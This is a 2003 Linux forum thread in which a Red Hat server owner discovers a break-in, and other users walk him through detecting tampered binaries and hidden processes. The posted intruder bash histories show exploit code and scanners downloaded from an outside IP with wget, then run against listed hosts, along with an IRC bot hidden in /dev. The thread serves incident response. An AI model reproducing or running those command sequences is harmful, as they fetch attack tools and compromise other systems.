Find the answer to your Linux question:
Page 1 of 2 1 2 LastLast
Results 1 to 10 of 17
Hey, I'm running RH8 server with Apache, PHP, PHPNuke, MySQL, SSH, etc - it's publically facing. Yesterday, I noticed that my system was down (networking not running) - So I ...
Enjoy an ad free experience by logging in. Not a member yet? Register.
  1. #1
    Just Joined!
    Join Date
    Apr 2003
    Posts
    5

    Very Strange Problem - Have I been hacked ?


    Hey,

    I'm running RH8 server with Apache, PHP, PHPNuke, MySQL, SSH, etc - it's publically facing.

    Yesterday, I noticed that my system was down (networking not running) - So I rebooted - On startup I noticed lots of messages referring to a segmentation fault - I narrowed the fault down to 'grep' - everytime I run grep, I get the segmentation fault. I looked at the 'grep' file and compared it to another RH8 system I have here (private system) - The size of grep was different , I renamed the bad grep, copied the grep from the other system and ran it - worked fine. (Bad grep size = 120360, Good grep 116264)

    However, after a while, the good grep changed size (for reasons I can't work out) to the same size as the bad grep. It also now does the segmentation fault thing.

    I renamed and copied again - and the exact same thing happened.

    Checked my logs and found this :

    <security log>
    Apr 27 16:36:10 spr6 sshd[19263]: Failed password for x from 203.130.216.132 port 1171
    Apr 27 16:36:16 spr6 sshd[19263]: Accepted password for x from 203.130.216.132 port 1171
    Apr 27 16:58:54 spr6 sshd[19321]: Failed password for x from 203.130.216.129 port 1172
    Apr 27 16:59:16 spr6 sshd[19321]: Accepted password for x from 203.130.216.129 port 1172
    Apr 27 21:56:21 spr6 sshd[24219]: Did not receive identification string from 206.57.63.9
    Apr 27 21:57:48 spr6 sshd[24220]: Did not receive identification string from 206.57.63.9

    I didn't think that I had a user called 'x' on my system - checked on the other system and yep , no x

    Here's the entry out of the /etc/passwd file

    x:502:502::/dev/x:/bin/basha

    There also was another user created named 'zunja' but I deleted it before I knew what what going on, having though I may have created this one during my testing ages ago....

    I don't get it - my root password is very strong, not in a dictionary, etc - maybe I wasnt' hacked ??

    Can anyone shed any light on this ???

    I don't want to rebuild the sytem and I would really like to find out what happened. I reckon that be getting grep working properly, it will be all good again....

    BTW - the web server was just running anything very interesting....

  2. #2
    Linux Guru
    Join Date
    Oct 2001
    Location
    Täby, Sweden
    Posts
    7,578
    Yeah, you're most probably cracked. Although I'd reommend that you reinstall your system, I have myself had one of my boxes cracked (even rooted, like you probably are now) some times, and it's all restored to normal.
    Check if some normal utils have been altered with "rpm -V sh-utils textutils" and some other packages you might want to check. Also check your /etc/rc.d/rc.sysinit and similar files if they've been altered. You might also want to check if ps hides anything for you with these:
    Code:
    ps -Am | wc
    ls -d /proc/&#91;0-9&#93;* | wc
    The first one is supposed to report one more line, since ps also prints a header line, so don't worry about that.
    Also, check for processes that have their executable files removed or hidden in dot-directories:
    Code:
    ls -l /proc/&#91;0-9&#93;*/exe 2>/dev/null | grep -e delete -e \\.
    You might also want to check out that /dev/x directory.
    Also, do this:
    Code:
    find / -name .bash_history 2>/dev/null
    No worms that I've seen has covered that track. Therefore, if you check out any unexpected .bash_histories, you might be able to see what it did, and therefore be able to undo it.

    Also remember to report 203.130.216.132 to his ISP. Check which one that is with "whois -h whois.arin.net 203.130.216.132".

  3. #3
    Linux Guru
    Join Date
    Oct 2001
    Location
    Täby, Sweden
    Posts
    7,578
    I checked that IP for you, and it came from Indonesia, so I queried it against whois.apnic.net instead, which returned this:
    Code:
    inetnum&#58;      203.130.192.0 - 203.130.223.255
    netname&#58;      TELKOMNET
    descr&#58;        PT TELEKOMUNIKASI INDONESIA
    descr&#58;        Jln Japati No 1
    country&#58;      ID
    admin-c&#58;      JW1-ID
    tech-c&#58;       EH10-AP
    remarks&#58;      service provider
    mnt-by&#58;       APNIC-HM
    mnt-lower&#58;    MAINT-TELKOMNET
    changed&#58;      hm-changed@apnic.net 20030226
    changed&#58;      hm-changed@apnic.net 20030228
    status&#58;       ALLOCATED PORTABLE
    source&#58;       APNIC
    
    person&#58;       Joedi Wisoeda
    address&#58;      PT TELEKOMUNIKASI INDONESIA &#40;DIVMEDIA&#41;
    address&#58;      Jln Kebon Sirih No. 37
    address&#58;      JAKARTA 10340
    country&#58;      ID
    phone&#58;        +62-21-3160500 Ext. 312
    fax-no&#58;       +62-21-3160700
    e-mail&#58;       joedi@telkom.co.id
    nic-hdl&#58;      JW1-ID
    mnt-by&#58;       MAINT-TELKOMNET
    changed&#58;      joedi@telkom.co.id 20020729
    source&#58;       APNIC
    
    person&#58;       ERI PUNTA HENDRASWARA
    address&#58;      PT. TELEKOMUNIKASI INDONESIA &#40;DIVMEDIA&#41;
    address&#58;      GRAHA CITRA CARAKA BUILDING
    address&#58;      Jl. Gatot Subroto Kav. 52 , 3 rd floor
    address&#58;      Jakarta, Indonesia 12710
    country&#58;      ID
    phone&#58;        +62-21-5229248
    fax-no&#58;       +62-21-5222296
    e-mail&#58;       phunta@telkom.co.id
    nic-hdl&#58;      EH10-AP
    mnt-by&#58;       MAINT-TELKOMNET
    changed&#58;      joedi@telkom.net.id 19980831
    source&#58;       APNIC
    So, go to http://www.telkom.co.id/, try to find their abuse report address, and report this to them. If you can't find it, just try abuse@telkom.co.id, or one of the listed addresses, like joedi@telkom.co.id or phunta@telkcom.co.id.

  4. #4
    Just Joined!
    Join Date
    Apr 2003
    Posts
    5
    Thanks for that

    Hmmmmm - looks like you are right.

    <.bash_history of user x>

    mkdir " "
    cd " "
    wget 216.10.18.215/source/r.c
    gcc -o sj r.c
    ls -al
    cat /tc/passwd
    cat /etc/passwd
    mkdir " "
    cd " "
    ls -al
    wget 216.10.18.215/source/mass_samba.tar.gz
    tar -xzf mass_samba.tar.gz
    cd sambal
    ./sambal -b2 -v 202.139.229.85
    ls
    ./mass_samba_obsd_31 202 139 139
    ./sambal -b2 -v 203.75.8.197
    ./sambal -b2 -v 203.131.96.179
    ./sambal -b2 -v 203.51.200.19
    ./sambal -b2 -v 203.51.200.19
    ./sambal -b2 -v 66.147.116.49
    ssh -p 9999 66.147.116.49
    ssh -p 9999 -l root 66.147.116.49
    cd " "/sambal
    ping 66.147.30.140
    ./sambal -b2 -v 66.147.30.140
    ssh -p 9999 66.147.30.140
    ./sambal -b2 -v 62.148.81.107
    ./sambal -b2 -v 24.237.3.43
    ping 24.237.3.43
    ping 203.250.136.217
    ./sambal -b2 -v 203.250.136.217
    cd ..
    lynx -source 216.10.18.215/source/scanbsd.tar.gz > scanbsd.tar.gz
    wget 216.10.18.215/source/scanbsd.tar.gz > scanbsd.tar.gz
    ls -al
    rmscanbsd.tar.gz.1
    rm scanbsd.tar.gz.1
    rm scanbsd.tar.gz
    wget 216.10.18.215/source/scanbsd.tar.gz > scanbsd.tar.gz
    ls -al
    rm scanbsd.tar.gz
    mv scanbsd.tar.gz.1 scanbsd.tar.gz
    tar -xzf scanbsd.tar.gz
    ./scanbsd 206

    More.............................................. ................

    [root@www /]# rpm -V sh-utils textutils
    S.5....T /bin/basename
    S.5....T /usr/bin/md5sum

    More.............................................. ....................

    [root@www x]# find / -name scanbsd -print
    /dev/x/ /scanbsd





    I have reported this to the places you suggest

    I had a look at rc.sysinit - I'm not very good with scripting , would take me ages to go thru it all -

    Easier to backup my data, rebuild (a more secure) system

    Thanks very much for your help !

  5. #5
    Just Joined!
    Join Date
    Apr 2003
    Posts
    5
    Found this in root's .bash history too ....

    export PATH="."
    inetd
    inetd
    inetd
    inetd
    w
    last -10
    /etc/rc.d/init.d/smb stop
    setup
    w
    mkdir /dev/ida/" ,"
    cd /dev/ida/" ,"
    cd /tmp
    ls -al
    mv emech.tar.gz /dev/ida/" ,"
    cd /dev/ida/" ,"
    tar xvzf emech.tar.gz
    cd emech
    pico mech.set
    vi mech.set
    bash
    w
    cd /dev/ida
    cd ...
    mkdir ...
    cd ...
    ftp never-ask-me-asl-pls.net
    tar xvfz new.tgz
    cd ne
    cd new
    ./scan 43.113
    ./scan 40.128
    ./scan 140.21
    ./scan 193.226
    exit

  6. #6
    Linux Newbie
    Join Date
    Apr 2003
    Location
    UK, Manchester
    Posts
    147
    He/she is not very smart, the first thing you do is get rid of any evidence of unusual activity.
    Normally by setting the HISTSIZE bash variable to 0 so that it doesnt save anything to the history and maybe checking /var/log/messages.

    Dont do a backup, and dont trust any previous backups. If you cant get an exact time that the intrusion occured then you cant trust any of your backups.

    Save your config files (only the ones you need) and check them for anything unusul and do a re-install.

    You might want to read some security texts to ensure (well try to this doesnt happen again.
    Securing and Optimzing Red Hat Linux
    Securing Debian

  7. #7
    Linux Engineer
    Join Date
    Jan 2003
    Location
    Lebanon, pa
    Posts
    994
    Haha, I can't believe that left a history file. What is this world coming to

  8. #8
    Linux Guru
    Join Date
    Oct 2001
    Location
    Täby, Sweden
    Posts
    7,578
    Well, seriously, every worm I've had a problem with has left a history file. Probably not the first thing a cracker would think of, right? (Certainly not the first thing I'd think of, at least)

  9. #9
    Linux Newbie
    Join Date
    Apr 2003
    Location
    UK, Manchester
    Posts
    147
    Worms usually just have a single purpose and have no need for the system afterwards. Most half decent crackers will want to keep from being noticed and use the system to launch attacks on other pcs/networks.

    This was a s'kiddie, not very good though. Dont understand why he would make hidden directories but not clear out the history.

    Maybe he felt comfortable that he wouldnt be caught ?

  10. #10
    Linux Guru
    Join Date
    Oct 2001
    Location
    Täby, Sweden
    Posts
    7,578
    Wouldn't it be funny if you could decode his password and see if he uses the same on his home computer? =)

Page 1 of 2 1 2 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •